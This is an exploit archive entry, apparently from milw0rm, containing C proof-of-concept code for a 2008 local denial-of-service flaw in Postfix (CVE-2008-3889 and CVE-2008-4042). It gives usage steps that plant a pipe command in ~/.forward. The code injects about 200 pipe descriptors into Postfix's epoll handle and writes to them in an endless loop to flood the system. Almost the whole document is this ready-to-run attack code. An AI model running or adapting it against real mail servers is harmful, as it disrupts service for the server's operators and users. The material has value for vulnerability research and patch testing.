Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service

                							

                /*
 * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c
 * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c
 *
 * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 
 * before 2.6-20080902, when used with the Linux 2.6 kernel.
 *
 * CVE-2008-3889 & CVE-2008-4042
 *
 * by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
 * and Marc Morata Fité <marc.morata.fite[at]gmail[dot]com> 
 * 2008-09-16
 *
 * This Proof of concept creates a pipe and adds it in the postfix's epoll 
 * file descriptor.
 * When the pipe is added, an endless loop will launch lots of events to the 
 * local and master postfix processes. 
 * This will slowdown de system a lot.
 *
 * An example of use:
 * 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with 
 * the double quotes) 
 * in the file ~/.forward
 *
 * 2- Put the CVE-2008-4042-exploit in your home
 * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit
 *
 * 3- Send and email to the user
 *
 * You can see the output at /tmp/postfix.log
 */


#include <sys/epoll.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dirent.h>
#include <errno.h>

#define FDOPEN 200


void add_fd(int fde, int fd) {
	printf("[*] Adding fd %d to eventpoll %d\n", fd, fde);
	static struct epoll_event ev;
	ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;
	errno =0;
	// If this is a socket fd, the load is high
	ev.data.u32 = 6;
	ev.data.u64 = 6;

	if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {
		printf(" => Fd %d added!\n", fd);
	} else {
		printf(" => Error (%d) adding fd %d\n", errno, fd);
	}
}

int main(int argc, char *argv[]) {

	int fds[2];
	char dir[32], c;
	int i, found = 0;

	pipe(fds);
	sprintf(dir, "/proc/%d/fd", getpid());
	printf("[*] Opening directory %s\n", dir);
	DIR *fd_dir = opendir(dir);
	struct dirent *de = readdir(fd_dir);

	// We are looking for the eventpoll file descriptor
	while (de != NULL) {
		char link_d[256];
		char link_f[256];
		memset(link_d, 0, 256);
		sprintf(link_f, "%s/%s", dir, de->d_name);
		readlink(link_f, link_d, 256);
		if ( strstr(link_d, "eventpoll") ) {
			found = 1;
			printf(" => %s points to %s\n", de->d_name, link_d);
			add_fd(atoi(de->d_name), fds[0]);
			// We can test with more than one triggered event at once
			for (i = 0; i<FDOPEN; i++)
				add_fd(atoi(de->d_name),dup(fds[0]));
		}
		de = readdir(fd_dir);
	}
	closedir(fd_dir);
	
	if (found == 0) {
		printf("[!] Are you sure that your postfix is vulnerable?\n");
		printf("[!] Are you launching me throw a .forward file?\n");
		exit(0);
	}
	
	printf("[*] Starting to flood the system!\n");
	fflush(stdout);
	close(0);
	close(1);
	close(2);

	// This triggers the events
	while (1) {
		write(fds[1], "A",1);
		read(fds[0],&c, 1);
	}

	return 0;
}

// milw0rm.com [2008-09-16]